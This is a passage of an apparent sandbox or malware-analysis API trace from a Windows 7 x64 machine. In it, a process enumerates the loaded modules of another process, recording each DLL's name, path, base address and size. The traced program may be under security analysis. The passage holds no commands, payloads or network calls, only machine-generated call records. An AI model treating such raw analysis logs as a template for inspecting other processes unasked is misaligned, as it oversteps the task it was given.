lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0067.475] CoTaskMemFree (pv=0xd910e0) [0067.475] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x24e7650, cb=0x18 | out: lpmodinfo=0x24e7650*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0067.476] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.476] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0067.477] CoTaskMemFree (pv=0xd910e0) [0067.477] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.477] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0067.478] CoTaskMemFree (pv=0xd910e0) [0067.478] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x24e9810, cb=0x18 | out: lpmodinfo=0x24e9810*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0067.479] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.479] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0067.480] CoTaskMemFree (pv=0xd910e0) [0067.480] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.480] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0067.482] CoTaskMemFree (pv=0xd910e0) [0067.482] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8f90000, lpmodinfo=0x24eb9e0, cb=0x18 | out: lpmodinfo=0x24eb9e0*(lpBaseOfDll=0x7fef8f90000, SizeOfImage=0x1ca000, EntryPoint=0x7fef8f97a60)) returned 1 [0067.483] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.483] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8f90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="EXPLORERFRAME.dll") returned 0x11 [0067.484] CoTaskMemFree (pv=0xd910e0) [0067.484] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.484] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8f90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\EXPLORERFRAME.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")) returned 0x25 [0067.485] CoTaskMemFree (pv=0xd910e0) [0067.485] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbd60000, lpmodinfo=0x24edcd8, cb=0x18 | out: lpmodinfo=0x24edcd8*(lpBaseOfDll=0x7fefbd60000, SizeOfImage=0x43000, EntryPoint=0x7fefbd6c168)) returned 1 [0067.486] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.486] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbd60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DUser.dll") returned 0x9 [0067.488] CoTaskMemFree (pv=0xd910e0) [0067.488] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.488] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbd60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DUser.dll" (normalized: "c:\\windows\\system32\\duser.dll")) returned 0x1d [0067.490] CoTaskMemFree (pv=0xd910e0) [0067.490] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbdb0000, lpmodinfo=0x24efe98, cb=0x18 | out: lpmodinfo=0x24efe98*(lpBaseOfDll=0x7fefbdb0000, SizeOfImage=0xf2000, EntryPoint=0x7fefbddac20)) returned 1 [0067.491] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.491] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbdb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DUI70.dll") returned 0x9 [0067.492] CoTaskMemFree (pv=0xd910e0) [0067.493] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.493] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbdb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DUI70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")) returned 0x1d [0067.494] CoTaskMemFree (pv=0xd910e0) [0067.494] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24f2058, cb=0x18 | out: lpmodinfo=0x24f2058*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0067.495] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.495] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.dll") returned 0x9 [0067.497] CoTaskMemFree (pv=0xd910e0) [0067.497] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.497] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0067.498] CoTaskMemFree (pv=0xd910e0) [0067.498] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24f4218, cb=0x18 | out: lpmodinfo=0x24f4218*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0067.499] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.499] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0067.501] CoTaskMemFree (pv=0xd910e0) [0067.501] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.501] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0067.502] CoTaskMemFree (pv=0xd910e0) [0067.502] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc0d0000, lpmodinfo=0x24f63d8, cb=0x18 | out: lpmodinfo=0x24f63d8*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0067.504] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.504] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0067.505] CoTaskMemFree (pv=0xd910e0) [0067.505] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.505] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0067.507] CoTaskMemFree (pv=0xd910e0) [0067.507] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb720000, lpmodinfo=0x24f8598, cb=0x18 | out: lpmodinfo=0x24f8598*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0067.508] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.508] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0067.510] CoTaskMemFree (pv=0xd910e0) [0067.510] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.510] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0067.511] CoTaskMemFree (pv=0xd910e0) [0067.511] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x24fa768, cb=0x18 | out: lpmodinfo=0x24fa768*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0067.513] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.513] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0067.514] CoTaskMemFree (pv=0xd910e0) [0067.514] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.514] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0067.516] CoTaskMemFree (pv=0xd910e0) [0067.516] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x24fc938, cb=0x18 | out: lpmodinfo=0x24fc938*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0067.518] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.518] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0067.519] CoTaskMemFree (pv=0xd910e0) [0067.519] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.520] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0067.521] CoTaskMemFree (pv=0xd910e0) [0067.521] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x24feb08, cb=0x18 | out: lpmodinfo=0x24feb08*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0067.523] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.523] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0067.524] CoTaskMemFree (pv=0xd910e0) [0067.524] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.524] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0067.526] CoTaskMemFree (pv=0xd910e0) [0067.526] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbca0000, lpmodinfo=0x2500cc8, cb=0x18 | out: lpmodinfo=0x2500cc8*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0067.528] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.528] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbca0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0067.530] CoTaskMemFree (pv=0xd910e0) [0067.530] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.530] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbca0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0067.531] CoTaskMemFree (pv=0xd910e0) [0067.531] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb320000, lpmodinfo=0x2502e88, cb=0x18 | out: lpmodinfo=0x2502e88*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0067.533] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.533] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb320000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0067.535] CoTaskMemFree (pv=0xd910e0) [0067.535] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.535] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb320000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0067.537] CoTaskMemFree (pv=0xd910e0) [0067.537] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbeb0000, lpmodinfo=0x2505038, cb=0x18 | out: lpmodinfo=0x2505038*(lpBaseOfDll=0x7fefbeb0000, SizeOfImage=0x215000, EntryPoint=0x7fefc0864b0)) returned 1 [0067.539] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.539] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbeb0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="gdiplus.dll") returned 0xb [0067.541] CoTaskMemFree (pv=0xd910e0) [0067.541] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.541] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbeb0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")) returned 0x73 [0067.542] CoTaskMemFree (pv=0xd910e0) [0067.543] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x25072b8, cb=0x18 | out: lpmodinfo=0x25072b8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0067.544] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.544] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Secur32.dll") returned 0xb [0067.546] CoTaskMemFree (pv=0xd910e0) [0067.546] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.546] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0067.548] CoTaskMemFree (pv=0xd910e0) [0067.548] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2509478, cb=0x18 | out: lpmodinfo=0x2509478*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0067.550] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.550] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0067.552] CoTaskMemFree (pv=0xd910e0) [0067.552] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.552] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0067.554] CoTaskMemFree (pv=0xd910e0) [0067.554] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc130000, lpmodinfo=0x250b638, cb=0x18 | out: lpmodinfo=0x250b638*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0067.556] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.556] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc130000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0067.558] CoTaskMemFree (pv=0xd910e0) [0067.558] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.558] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc130000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0067.560] CoTaskMemFree (pv=0xd910e0) [0067.560] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x250d7f8, cb=0x18 | out: lpmodinfo=0x250d7f8*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0067.562] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.562] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0067.564] CoTaskMemFree (pv=0xd910e0) [0067.564] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.564] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0067.566] CoTaskMemFree (pv=0xd910e0) [0067.566] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x250fbd0, cb=0x18 | out: lpmodinfo=0x250fbd0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0067.569] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.569] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0067.571] CoTaskMemFree (pv=0xd910e0) [0067.571] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.571] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0067.573] CoTaskMemFree (pv=0xd910e0) [0067.573] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc2b0000, lpmodinfo=0x2511da0, cb=0x18 | out: lpmodinfo=0x2511da0*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0067.575] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.575] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0067.577] CoTaskMemFree (pv=0xd910e0) [0067.578] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.578] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0067.580] CoTaskMemFree (pv=0xd910e0) [0067.580] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbb30000, lpmodinfo=0x2514028, cb=0x18 | out: lpmodinfo=0x2514028*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0067.582] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.582] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbb30000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0067.584] CoTaskMemFree (pv=0xd910e0) [0067.584] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.584] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb30000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0067.586] CoTaskMemFree (pv=0xd910e0) [0067.586] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x2516208, cb=0x18 | out: lpmodinfo=0x2516208*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0067.588] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.588] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0067.591] CoTaskMemFree (pv=0xd910e0) [0067.591] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.591] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0067.593] CoTaskMemFree (pv=0xd910e0) [0067.593] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa0f0000, lpmodinfo=0x25183c8, cb=0x18 | out: lpmodinfo=0x25183c8*(lpBaseOfDll=0x7fefa0f0000, SizeOfImage=0x57000, EntryPoint=0x7fefa0f1118)) returned 1 [0067.595] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.595] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa0f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0067.598] CoTaskMemFree (pv=0xd910e0) [0067.598] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.598] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa0f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")) returned 0x1f [0067.601] CoTaskMemFree (pv=0xd910e0) [0067.601] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x251a588, cb=0x18 | out: lpmodinfo=0x251a588*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0067.603] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.603] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0067.605] CoTaskMemFree (pv=0xd910e0) [0067.605] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.605] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0067.608] CoTaskMemFree (pv=0xd910e0) [0067.608] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef91a0000, lpmodinfo=0x251c748, cb=0x18 | out: lpmodinfo=0x251c748*(lpBaseOfDll=0x7fef91a0000, SizeOfImage=0x56000, EntryPoint=0x7fef91a86e8)) returned 1 [0067.610] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.610] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef91a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FileSyncShell64.dll") returned 0x13 [0067.612] CoTaskMemFree (pv=0xd910e0) [0067.612] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.612] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef91a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll")) returned 0x5c [0067.615] CoTaskMemFree (pv=0xd910e0) [0067.615] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8ee0000, lpmodinfo=0x251e998, cb=0x18 | out: lpmodinfo=0x251e998*(lpBaseOfDll=0x7fef8ee0000, SizeOfImage=0xa7000, EntryPoint=0x7fef8f2b93c)) returned 1 [0067.617] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.617] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8ee0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSVCP110.dll") returned 0xc [0067.620] CoTaskMemFree (pv=0xd910e0) [0067.620] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.620] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8ee0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\MSVCP110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll")) returned 0x55 [0067.622] CoTaskMemFree (pv=0xd910e0) [0067.622] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8e10000, lpmodinfo=0x2520bd0, cb=0x18 | out: lpmodinfo=0x2520bd0*(lpBaseOfDll=0x7fef8e10000, SizeOfImage=0xce000, EntryPoint=0x7fef8e330fc)) returned 1 [0067.625] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.625] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8e10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSVCR110.dll") returned 0xc [0067.627] CoTaskMemFree (pv=0xd910e0) [0067.627] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.628] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8e10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\MSVCR110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll")) returned 0x55 [0067.630] CoTaskMemFree (pv=0xd910e0) [0067.630] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2522e08, cb=0x18 | out: lpmodinfo=0x2522e08*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0067.633] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.633] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0067.635] CoTaskMemFree (pv=0xd910e0) [0067.635] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.635] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0067.638] CoTaskMemFree (pv=0xd910e0) [0067.638] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefde60000, lpmodinfo=0x2524fc8, cb=0x18 | out: lpmodinfo=0x2524fc8*(lpBaseOfDll=0x7fefde60000, SizeOfImage=0x12a000, EntryPoint=0x7fefde610d4)) returned 1 [0067.640] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.640] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefde60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WININET.dll") returned 0xb [0067.643] CoTaskMemFree (pv=0xd910e0) [0067.643] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0067.643] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefde60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WININET.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0067.646] CoTaskMemFree (pv=0xd910e0) [0067.646] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff510000, lpmodinfo=0x25271a0, cb=0x18 | out: 